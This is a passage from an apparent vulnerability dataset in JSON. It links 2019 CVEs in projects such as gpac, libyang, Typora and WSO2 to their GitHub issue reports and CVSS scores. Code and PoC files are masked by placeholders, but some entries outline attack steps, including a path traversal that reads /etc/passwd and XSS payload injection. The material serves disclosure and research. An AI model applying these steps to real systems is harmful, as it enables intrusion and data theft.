  41778. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41779. "severity": "MEDIUM",
  41780. "baseScore": 5.5,
  41781. "impactScore": 3.6,
  41782. "exploitabilityScore": 1.8
  41783. },
  41784. {
  41785. "CVE_ID": "CVE-2019-20160",
  41786. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1334",
  41787. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1334",
  41788. "Repo_new": "gpac/gpac",
  41789. "Issue_Created_At": "2019-11-09T11:22:06Z",
  41790. "description": "APITAG stack buffer overflow in a NUMBERTAG parse_tile_group APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41791. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41792. "severity": "MEDIUM",
  41793. "baseScore": 5.5,
  41794. "impactScore": 3.6,
  41795. "exploitabilityScore": 1.8
  41796. },
  41797. {
  41798. "CVE_ID": "CVE-2019-20161",
  41799. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1320",
  41800. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1320",
  41801. "Repo_new": "gpac/gpac",
  41802. "Issue_Created_At": "2019-10-28T15:50:52Z",
  41803. "description": "APITAG heap buffer overflow in APITAG at APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG gdb info: ERRORTAG",
  41804. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41805. "severity": "MEDIUM",
  41806. "baseScore": 5.5,
  41807. "impactScore": 3.6,
  41808. "exploitabilityScore": 1.8
  41809. },
  41810. {
  41811. "CVE_ID": "CVE-2019-20162",
  41812. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1327",
  41813. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1327",
  41814. "Repo_new": "gpac/gpac",
  41815. "Issue_Created_At": "2019-11-09T11:12:14Z",
  41816. "description": "ERROR: APITAG heap buffer overflow in gf_isom_box_parse_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG URLTAG For POC new gf_isom_box_parse_ex gdb info: CODETAG For POC new gf_isom_box_parse_e NUMBERTAG gdb info: CODETAG For POC new gf_isom_box_parse_ex ASAN info: ERRORTAG For POC new gf_isom_box_parse_e NUMBERTAG ERRORTAG",
  41817. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41818. "severity": "MEDIUM",
  41819. "baseScore": 5.5,
  41820. "impactScore": 3.6,
  41821. "exploitabilityScore": 1.8
  41822. },
  41823. {
  41824. "CVE_ID": "CVE-2019-20163",
  41825. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1335",
  41826. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1335",
  41827. "Repo_new": "gpac/gpac",
  41828. "Issue_Created_At": "2019-11-09T11:23:01Z",
  41829. "description": "APITAG SEGV in gf_odf_avc_cfg_write_bs APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41830. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41831. "severity": "MEDIUM",
  41832. "baseScore": 5.5,
  41833. "impactScore": 3.6,
  41834. "exploitabilityScore": 1.8
  41835. },
  41836. {
  41837. "CVE_ID": "CVE-2019-20164",
  41838. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1332",
  41839. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1332",
  41840. "Repo_new": "gpac/gpac",
  41841. "Issue_Created_At": "2019-11-09T11:19:52Z",
  41842. "description": "APITAG SEGV in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
  41843. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41844. "severity": "MEDIUM",
  41845. "baseScore": 5.5,
  41846. "impactScore": 3.6,
  41847. "exploitabilityScore": 1.8
  41848. },
  41849. {
  41850. "CVE_ID": "CVE-2019-20165",
  41851. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1338",
  41852. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1338",
  41853. "Repo_new": "gpac/gpac",
  41854. "Issue_Created_At": "2019-11-09T12:06:24Z",
  41855. "description": "ERROR: APITAG SEGV in APITAG APITAG Hello, I found a similar issue but I am not sure they are the same. URLTAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41857. "severity": "MEDIUM",
  41858. "baseScore": 5.5,
  41859. "impactScore": 3.6,
  41860. "exploitabilityScore": 1.8
  41861. },
  41862. {
  41863. "CVE_ID": "CVE-2019-20166",
  41864. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1331",
  41865. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1331",
  41866. "Repo_new": "gpac/gpac",
  41867. "Issue_Created_At": "2019-11-09T11:18:44Z",
  41868. "description": "APITAG SEGV in gf_isom_dump APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
  41869. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41870. "severity": "MEDIUM",
  41871. "baseScore": 5.5,
  41872. "impactScore": 3.6,
  41873. "exploitabilityScore": 1.8
  41874. },
  41875. {
  41876. "CVE_ID": "CVE-2019-20167",
  41877. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1330",
  41878. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1330",
  41879. "Repo_new": "gpac/gpac",
  41880. "Issue_Created_At": "2019-11-09T11:17:12Z",
  41881. "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41882. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41883. "severity": "MEDIUM",
  41884. "baseScore": 5.5,
  41885. "impactScore": 3.6,
  41886. "exploitabilityScore": 1.8
  41887. },
  41888. {
  41889. "CVE_ID": "CVE-2019-20168",
  41890. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1333",
  41891. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1333",
  41892. "Repo_new": "gpac/gpac",
  41893. "Issue_Created_At": "2019-11-09T11:21:05Z",
  41894. "description": "APITAG heap use after free in gf_isom_box_dump_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41895. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41896. "severity": "MEDIUM",
  41897. "baseScore": 5.5,
  41898. "impactScore": 3.6,
  41899. "exploitabilityScore": 1.8
  41900. },
  41901. {
  41902. "CVE_ID": "CVE-2019-20169",
  41903. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1329",
  41904. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1329",
  41905. "Repo_new": "gpac/gpac",
  41906. "Issue_Created_At": "2019-11-09T11:15:44Z",
  41907. "description": "APITAG heap use after free in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41909. "severity": "MEDIUM",
  41910. "baseScore": 5.5,
  41911. "impactScore": 3.6,
  41912. "exploitabilityScore": 1.8
  41913. },
  41914. {
  41915. "CVE_ID": "CVE-2019-20170",
  41916. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1328",
  41917. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1328",
  41918. "Repo_new": "gpac/gpac",
  41919. "Issue_Created_At": "2019-11-09T11:14:15Z",
  41920. "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
  41921. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41922. "severity": "MEDIUM",
  41923. "baseScore": 5.5,
  41924. "impactScore": 3.6,
  41925. "exploitabilityScore": 1.8
  41926. },
  41927. {
  41928. "CVE_ID": "CVE-2019-20171",
  41929. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1337",
  41930. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1337",
  41931. "Repo_new": "gpac/gpac",
  41932. "Issue_Created_At": "2019-11-09T12:00:28Z",
  41933. "description": "APITAG NUMBERTAG memory leaks of APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  41934. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41935. "severity": "MEDIUM",
  41936. "baseScore": 5.5,
  41937. "impactScore": 3.6,
  41938. "exploitabilityScore": 1.8
  41939. },
  41940. {
  41941. "CVE_ID": "CVE-2019-20205",
  41942. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/127",
  41943. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/127",
  41944. "Repo_new": "saitoha/libsixel",
  41945. "Issue_Created_At": "2019-12-31T08:03:38Z",
  41946. "description": "integer overflow in sixel_frame_resize in frame.c. In function APITAG , width and height can be specified by user. Line NUMBERTAG has an integer overflow. If width and height are very large numbers, allocation will fail. FILETAG poc: FILETAG result: ERRORTAG",
  41947. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41948. "severity": "HIGH",
  41949. "baseScore": 8.8,
  41950. "impactScore": 5.9,
  41951. "exploitabilityScore": 2.8
  41952. },
  41953. {
  41954. "CVE_ID": "CVE-2019-20208",
  41955. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1348",
  41956. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1348",
  41957. "Repo_new": "gpac/gpac",
  41958. "Issue_Created_At": "2019-11-13T07:25:13Z",
  41959. "description": "There is a stack buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code NUMBERTAG gpp.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG stack APITAG URLTAG The ASAN information is as follows: ERRORTAG",
  41960. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41961. "severity": "MEDIUM",
  41962. "baseScore": 5.5,
  41963. "impactScore": 3.6,
  41964. "exploitabilityScore": 1.8
  41965. },
  41966. {
  41967. "CVE_ID": "CVE-2019-20219",
  41968. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/15",
  41969. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/15",
  41970. "Repo_new": "miniupnp/ngiflib",
  41971. "Issue_Created_At": "2019-10-14T09:40:20Z",
  41972. "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bef2a0) Triggered by gif2tga $POC POC file: FILETAG asan ERRORTAG",
  41973. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41974. "severity": "HIGH",
  41975. "baseScore": 8.8,
  41976. "impactScore": 5.9,
  41977. "exploitabilityScore": 2.8
  41978. },
  41979. {
  41980. "CVE_ID": "CVE-2019-20329",
  41981. "Issue_Url_old": "https://github.com/open-lambda/open-lambda/issues/92",
  41982. "Issue_Url_new": "https://github.com/open-lambda/open-lambda/issues/92",
  41983. "Repo_new": "open-lambda/open-lambda",
  41984. "Issue_Created_At": "2019-12-16T06:22:47Z",
  41985. "description": "OL Server vulnerable to DNS Rebinding attacks.. The Rest API spawned on port NUMBERTAG isn't validating the Host header , as such the server is vulnerable to DNS Rebinding attacks. Impact : By tricking users into visiting a website, it will be possible to perform all Rest Calls on behalf of user from the attackers website, bypassing the same origin policy using DNS rebind. Few actions are calling functions",
  41986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
  41987. "severity": "HIGH",
  41988. "baseScore": 8.1,
  41989. "impactScore": 5.2,
  41990. "exploitabilityScore": 2.8
  41991. },
  41992. {
  41993. "CVE_ID": "CVE-2019-20330",
  41994. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2526",
  41995. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2526",
  41996. "Repo_new": "fasterxml/jackson-databind",
  41997. "Issue_Created_At": "2019-10-25T20:55:07Z",
  41998. "description": "Block two more gadget types (JNDI CVEs to be allocated). Another NUMBERTAG gadget ( ) types reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: Mitre id: Original discoverer: APITAG Planned to be fixed in: not yet NUMBERTAG backported in NUMBERTAG branch (no release yet)",
  41999. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42000. "severity": "CRITICAL",
  42001. "baseScore": 9.8,
  42002. "impactScore": 5.9,
  42003. "exploitabilityScore": 3.9
  42004. },
  42005. {
  42006. "CVE_ID": "CVE-2019-20354",
  42007. "Issue_Url_old": "https://github.com/colloqi/piSignage/issues/97",
  42008. "Issue_Url_new": "https://github.com/colloqi/pisignage/issues/97",
  42009. "Repo_new": "colloqi/pisignage",
  42010. "Issue_Created_At": "2019-11-13T02:19:31Z",
  42011. "description": "Path Traversal vulnerability. Describe the bug Suggested description of the vulnerability : A path traversal vulnerability in the web application component of APITAG NUMBERTAG allows a remote attacker authenticated as a low privilege user to download arbitrary files from the Raspberry Pi. Attack vector(s) FILETAG NUMBERTAG Click the Log Download button at the bottom of the APITAG administration page. FILETAG NUMBERTAG HTTP Packet is sent when the button is pressed. FILETAG NUMBERTAG Change the value of 'file' parameter to APITAG . FILETAG NUMBERTAG You can see that the /etc/passwd file is read. Affected URL/API(s) URL: APITAG Parameter: file Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK APITAG Version: APITAG",
  42012. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  42013. "severity": "MEDIUM",
  42014. "baseScore": 4.3,
  42015. "impactScore": 1.4,
  42016. "exploitabilityScore": 2.8
  42017. },
  42018. {
  42019. "CVE_ID": "CVE-2019-20374",
  42020. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/3124",
  42021. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/3124",
  42022. "Repo_new": "typora/typora-issues",
  42023. "Issue_Created_At": "2019-12-27T22:37:51Z",
  42024. "description": "Typora RCE via mXSS. Summary A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using APITAG could be prone to the same. Steps to reproduce / APITAG NUMBERTAG Create an .md with the following contents: ~~~ CODETAG NUMBERTAG Open the file in Typora NUMBERTAG Witness a calculator pop up: FILETAG The payload is simply HTML entity encoded ERRORTAG where the JS is simply: CODETAG Fix It's perhaps best to upgrade APITAG URLTAG to the latest version URLTAG which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old NUMBERTAG Consider employing Content Security Policy URLTAG for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered. Notes Versions known to be vulnerable and tested are NUMBERTAG These are the latest downloads from the website (for Linux and APITAG respectively). I did not test the Windows version of the app. CVSS NUMBERTAG My take is FILETAG",
  42025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  42026. "severity": "CRITICAL",
  42027. "baseScore": 9.6,
  42028. "impactScore": 6.0,
  42029. "exploitabilityScore": 2.8
  42030. },
  42031. {
  42032. "CVE_ID": "CVE-2019-20377",
  42033. "Issue_Url_old": "https://github.com/tophubs/TopList/issues/32",
  42034. "Issue_Url_new": "https://github.com/tophubs/toplist/issues/32",
  42035. "Repo_new": "tophubs/toplist",
  42036. "Issue_Created_At": "2019-09-03T08:37:33Z",
  42037. "description": "There is a Cross Site Scripting(XSS) Vulnerability. I watched a odd title when I visited your website",
  42038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42039. "severity": "MEDIUM",
  42040. "baseScore": 6.1,
  42041. "impactScore": 2.7,
  42042. "exploitabilityScore": 2.8
  42043. },
  42044. {
  42045. "CVE_ID": "CVE-2019-20378",
  42046. "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/351",
  42047. "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/351",
  42048. "Repo_new": "ganglia/ganglia-web",
  42049. "Issue_Created_At": "2019-12-17T01:38:44Z",
  42050. "description": "Two XSS issue found in.",
  42051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42052. "severity": "MEDIUM",
  42053. "baseScore": 6.1,
  42054. "impactScore": 2.7,
  42055. "exploitabilityScore": 2.8
  42056. },
  42057. {
  42058. "CVE_ID": "CVE-2019-20391",
  42059. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/772",
  42060. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/772",
  42061. "Repo_new": "cesnet/libyang",
  42062. "Issue_Created_At": "2019-04-26T17:01:20Z",
  42063. "description": "Segmentation fault in yangfuzz and yanglint. Hi, here is another file that crashes yangfuzz and yanglint. ERRORTAG Regards",
  42064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42065. "severity": "MEDIUM",
  42066. "baseScore": 6.5,
  42067. "impactScore": 3.6,
  42068. "exploitabilityScore": 2.8
  42069. },
  42070. {
  42071. "CVE_ID": "CVE-2019-20392",
  42072. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/723",
  42073. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/723",
  42074. "Repo_new": "cesnet/libyang",
  42075. "Issue_Created_At": "2019-03-07T19:25:40Z",
  42076. "description": "Segmentation fault when if feature is used in list key node, with a non existing feature. If an if feature statement is used inside a list key node, and the feature used is not defined, yanglint and yangfuzz segfault in lys_parse_path. Here is an example of a yang file that crashes the parser: CODETAG",
  42077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42078. "severity": "MEDIUM",
  42079. "baseScore": 6.5,
  42080. "impactScore": 3.6,
  42081. "exploitabilityScore": 2.8
  42082. },
  42083. {
  42084. "CVE_ID": "CVE-2019-20393",
  42085. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/742",
  42086. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/742",
  42087. "Repo_new": "cesnet/libyang",
  42088. "Issue_Created_At": "2019-03-29T11:16:03Z",
  42089. "description": "Heap corruption in yyparse. Hi, this file crashes lys_parse_path: CODETAG",
  42090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42091. "severity": "HIGH",
  42092. "baseScore": 8.8,
  42093. "impactScore": 5.9,
  42094. "exploitabilityScore": 2.8
  42095. },
  42096. {
  42097. "CVE_ID": "CVE-2019-20394",
  42098. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/769",
  42099. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/769",
  42100. "Repo_new": "cesnet/libyang",
  42101. "Issue_Created_At": "2019-04-26T09:14:19Z",
  42102. "description": "Heap corruption in lys_parse_path due to type statement in notification statement. Hi, this file causes heap corruption and crashes lys_parse_path CODETAG",
  42103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42104. "severity": "HIGH",
  42105. "baseScore": 8.8,
  42106. "impactScore": 5.9,
  42107. "exploitabilityScore": 2.8
  42108. },
  42109. {
  42110. "CVE_ID": "CVE-2019-20395",
  42111. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/724",
  42112. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/724",
  42113. "Repo_new": "cesnet/libyang",
  42114. "Issue_Created_At": "2019-03-08T10:26:25Z",
  42115. "description": "Segmentation fault due to self refential union type containing leafrefs. Hi, the following yang file causes a segmentation fault in lys_parse_path, caused by a stack overflow due to too many function calls. ERRORTAG The issue seems to be caused due to the self referential union type type containing a leaf ref. If the list5 leaf list is removed, the issue persists, but the stack overflow takes longer to appear. A gdb backtrace shows that the call stack is full of lys_copy_union_leafrefs calls, called in APITAG and APITAG Regards, Juraj",
  42116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42117. "severity": "MEDIUM",
  42118. "baseScore": 6.5,
  42119. "impactScore": 3.6,
  42120. "exploitabilityScore": 2.8
  42121. },
  42122. {
  42123. "CVE_ID": "CVE-2019-20396",
  42124. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/740",
  42125. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/740",
  42126. "Repo_new": "cesnet/libyang",
  42127. "Issue_Created_At": "2019-03-29T10:38:30Z",
  42128. "description": "Segmentation fault in yyparse due to malformed pattern statement value. Hello, this file crashes libyang when it is parsed with lys_parse_path: CODETAG Regards, Juraj",
  42129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42130. "severity": "MEDIUM",
  42131. "baseScore": 6.5,
  42132. "impactScore": 3.6,
  42133. "exploitabilityScore": 2.8
  42134. },
  42135. {
  42136. "CVE_ID": "CVE-2019-20397",
  42137. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/739",
  42138. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/739",
  42139. "Repo_new": "cesnet/libyang",
  42140. "Issue_Created_At": "2019-03-28T09:31:50Z",
  42141. "description": "Heap corruption due to invalid unterminated organization field in YANG file. Hello, this file crashes lys_parse_path: CODETAG Regards, Juraj",
  42142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42143. "severity": "HIGH",
  42144. "baseScore": 8.8,
  42145. "impactScore": 5.9,
  42146. "exploitabilityScore": 2.8
  42147. },
  42148. {
  42149. "CVE_ID": "CVE-2019-20398",
  42150. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/773",
  42151. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/773",
  42152. "Repo_new": "cesnet/libyang",
  42153. "Issue_Created_At": "2019-04-29T13:21:12Z",
  42154. "description": "Segmentation fault in yanglint and yangfuzz due to unprintable characters. Hi, this file crashes due to unprintable characters at the end of the file. Shortening the error message string removes the crash too, so I guess both issues are relevant. ERRORTAG Here is the file base NUMBERTAG encoded: CODETAG I've encoded the file with b NUMBERTAG rather than using the xxd output, since I assume decoding b NUMBERTAG is somewhat easier than creating the file from xxd. If you would prefer another format for files containing binary data, please let me know.",
  42155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42156. "severity": "MEDIUM",
  42157. "baseScore": 6.5,
  42158. "impactScore": 3.6,
  42159. "exploitabilityScore": 2.8
  42160. },
  42161. {
  42162. "CVE_ID": "CVE-2019-20421",
  42163. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1011",
  42164. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1011",
  42165. "Repo_new": "exiv2/exiv2",
  42166. "Issue_Created_At": "2019-09-30T12:02:01Z",
  42167. "description": "An infinite loop and hang in APITAG Describe the bug An input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file. To Reproduce Steps to reproduce the behaviour: excute PATHTAG APITAG Expected behavior An infinite loop and hang, with high CPU consumption FILETAG Additional context The poc is here FILETAG The code: > io_ APITAG > io_ APITAG APITAG leads to an infinite loop.",
  42168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42169. "severity": "HIGH",
  42170. "baseScore": 7.5,
  42171. "impactScore": 3.6,
  42172. "exploitabilityScore": 3.9
  42173. },
  42174. {
  42175. "CVE_ID": "CVE-2019-20434",
  42176. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/17",
  42177. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/17",
  42178. "Repo_new": "cybersecurityworks/disclosed",
  42179. "Issue_Created_At": "2019-11-27T10:43:00Z",
  42180. "description": "Multiple Reflected Cross Site Scripting (XSS) in WSO2 Product APITAG Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Data Analytics Server Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Figure NUMBERTAG Access the APITAG URL APITAG FILETAG Figure NUMBERTAG Add new property. FILETAG Figure NUMBERTAG SS payload added to path variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. FILETAG Figure NUMBERTAG SS payload added to name variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. APITAG NUMBERTAG APITAG Access the GET request APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. FILETAG Figure NUMBERTAG Access the APITAG URL APITAG to add new Data Source FILETAG Figure NUMBERTAG capturing the GET request and added XSS payload gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload, APITAG through vulnerable APITAG APITAG gets reflected whenever the user tries to access the APITAG URL. APITAG APITAG Steps APITAG APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG NUMBERTAG Add new property and capture the request in proxy and send it to repeater NUMBERTAG Add XSS payload APITAG to APITAG path & name APITAG variable one by one NUMBERTAG Then, the Injected XSS Payload APITAG will get reflected in the response. APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG to add new Data Source with encoded XSS payload APITAG and submit the data which gets reflected in the browser NUMBERTAG Or access the APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, \"We are looking into the issues you have reported. We will keep you posted regarding the progress of our evaluation of them NUMBERTAG Got mail confirming the APITAG NUMBERTAG APITAG and rejecting the APITAG NUMBERTAG APITAG are not a valid issue NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Public Announcement is done. Please refer NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
